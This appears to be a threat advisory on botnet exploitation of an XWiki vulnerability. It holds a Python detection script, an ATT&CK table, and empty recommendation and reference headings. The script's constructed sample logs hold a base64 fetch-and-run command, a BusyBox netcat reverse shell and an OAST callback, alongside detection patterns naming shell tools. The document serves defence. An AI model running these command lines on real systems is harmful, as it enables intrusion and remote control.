EXECUTIVE SUMMARY:
A surge in malicious activity targeting XWiki has been observed, with multiple threat actors, including the RondoDox botnet, actively exploiting a critical vulnerability, CVE-2025-24893, to gain remote access and execute unauthorized commands. What initially appeared to be isolated probing has evolved into widespread, coordinated campaigns involving botnets, cryptominer operators, and opportunistic attackers. This rise in exploitation highlights the growing risk to exposed XWiki instances and underlines the urgency for organizations to strengthen monitoring and remediation efforts.
Attackers are exploiting the flaw to execute system commands remotely, leveraging simple HTTP-based payload delivery methods. Activity linked to automated botnets includes the use of recognizable payload naming patterns and base64-encoded shell scripts that fetch and run additional malware such as cryptominers. Some adversaries have hosted payloads across diverse infrastructure ranges, while others have attempted direct interactive access through reverse shells using tools like BusyBox netcat. Alongside exploitation, scanning behavior has also increased, including Nuclei-based probing, generic command-execution tests, and out-of-band interaction attempts through OAST services, indicating both automated reconnaissance and targeted hands-on-keyboard activity.
The growing adoption of this exploit across varied threat groups demonstrates how quickly a vulnerability can be weaponized once publicly available. Relying solely on patching cycles may be insufficient given the speed of these attacks; organizations should strengthen detection capabilities, monitor for exploitation patterns, and implement layered defensive measures to reduce the risk of compromise in vulnerable XWiki environments.
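The indicators described above (shell commands delivered in HTTP query strings, base64-encoded fetch-and-run scripts, BusyBox netcat reverse shells, Nuclei scanning and OAST callbacks) can be turned into a first-pass log check. The script below is an added example written for this advisory, not tooling from the original report or from any of the named threat actors; the sample access-log lines are constructed (documentation IP ranges and a `placeholder.invalid` download host), and the OAST domain list, the command keyword list and the `/xwiki/` path filter are assumptions to tune for a given deployment.

```python
"""Scan combined-format web access logs for XWiki exploitation indicators.

Added example for this advisory. Flags: shell commands in query strings,
base64 blobs that decode to shell scripts, BusyBox netcat reverse shells,
Nuclei scanning and out-of-band (OAST) callback domains.
"""
import base64
import re
import urllib.parse
from typing import Dict, List, Optional

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shell tooling typical of fetch-and-run payloads (assumed keyword list; tune locally).
SHELL_CMD_RE = re.compile(r"\b(?:wget|curl|chmod|busybox|nc|sh|bash)\b")
# BusyBox netcat reverse-shell shapes: "busybox nc ..." or "nc -e ...".
NETCAT_RE = re.compile(r"\b(?:busybox\s+nc|nc\s+-e)\b")
# Candidate base64 blobs: long runs of the base64 alphabet with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Assumed list of common OAST callback domains; extend for your environment.
OAST_DOMAINS = ("oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online",
                "oast.me", "interact.sh", "oastify.com", "burpcollaborator.net")
# The default Nuclei user-agent carries the project URL.
NUCLEI_UA_MARKER = "projectdiscovery/nuclei"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format log line; return None when it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decoded_base64_blobs(text: str) -> List[str]:
    """Decode base64-looking runs that yield printable ASCII (an embedded shell script)."""
    out: List[str] = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def classify(entry: Dict[str, str]) -> List[str]:
    """Return indicator tags for a parsed entry; an empty list means nothing matched."""
    tags: List[str] = []
    target = urllib.parse.unquote(entry["target"])  # unquote, not unquote_plus: keep '+' in base64
    path, _, query = target.partition("?")
    scripts = decoded_base64_blobs(query)
    inspect = query + "\n" + "\n".join(scripts)  # look at raw query and decoded payloads together
    if "/xwiki/" in path and SHELL_CMD_RE.search(inspect):
        tags.append("xwiki-command-injection")
    if any(SHELL_CMD_RE.search(s) for s in scripts):
        tags.append("base64-shell-script")
    if NETCAT_RE.search(inspect):
        tags.append("reverse-shell-netcat")
    if any(d in inspect.lower() for d in OAST_DOMAINS):
        tags.append("oast-callback")
    if NUCLEI_UA_MARKER in entry["agent"].lower():
        tags.append("nuclei-scan")
    return tags


def scan_logs(lines) -> List[Dict[str, object]]:
    """Return one finding per log line that carries at least one indicator."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append({"ip": entry["ip"], "target": entry["target"], "tags": tags})
    return findings


# Constructed sample log lines (not from any real capture). 192.0.2.0/24,
# 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
_SCRIPT = "wget http://placeholder.invalid/x.sh -O /tmp/x.sh; sh /tmp/x.sh"
_B64 = base64.b64encode(_SCRIPT.encode()).decode()
_q = lambda s: urllib.parse.quote(s, safe="")
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Nov/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [10/Nov/2025:10:02:11 +0000] "GET /xwiki/bin/view/Main/?q={_q("echo " + _B64 + "|base64 -d|sh")} HTTP/1.1" 200 311 "-" "curl/8.4.0"',
    f'198.51.100.9 - - [10/Nov/2025:10:03:40 +0000] "GET /xwiki/bin/view/Main/?q={_q("busybox nc 192.0.2.9 4444 -e sh")} HTTP/1.1" 200 311 "-" "curl/8.4.0"',
    f'192.0.2.44 - - [10/Nov/2025:10:04:01 +0000] "GET /xwiki/bin/view/Main/?q={_q("curl http://abc123.oast.fun")} HTTP/1.1" 200 311 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"',
]

if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding["ip"], ",".join(finding["tags"]), finding["target"][:80])
```

Run against a real log with `scan_logs(open("access.log"))`. The keyword list is deliberately broad (`sh` alone will match some legitimate queries), so treat a single `xwiki-command-injection` tag as triage input and the combined tags (base64 script, netcat, OAST, Nuclei) as the higher-confidence signals; decoding base64 before matching is what catches the fetch-and-run scripts that a plain keyword search on the raw request would miss.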
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | — |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Discovery | T1087.001 | Account Discovery | Local Account |
| Discovery | T1082 | System Information Discovery | — |
| Lateral Movement | T1021.004 | Remote Services | SSH |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Impact | T1496.001 | Resource Hijacking | Compute Hijacking |
RECOMMENDATION:
REFERENCES:
The following reports contain further technical details: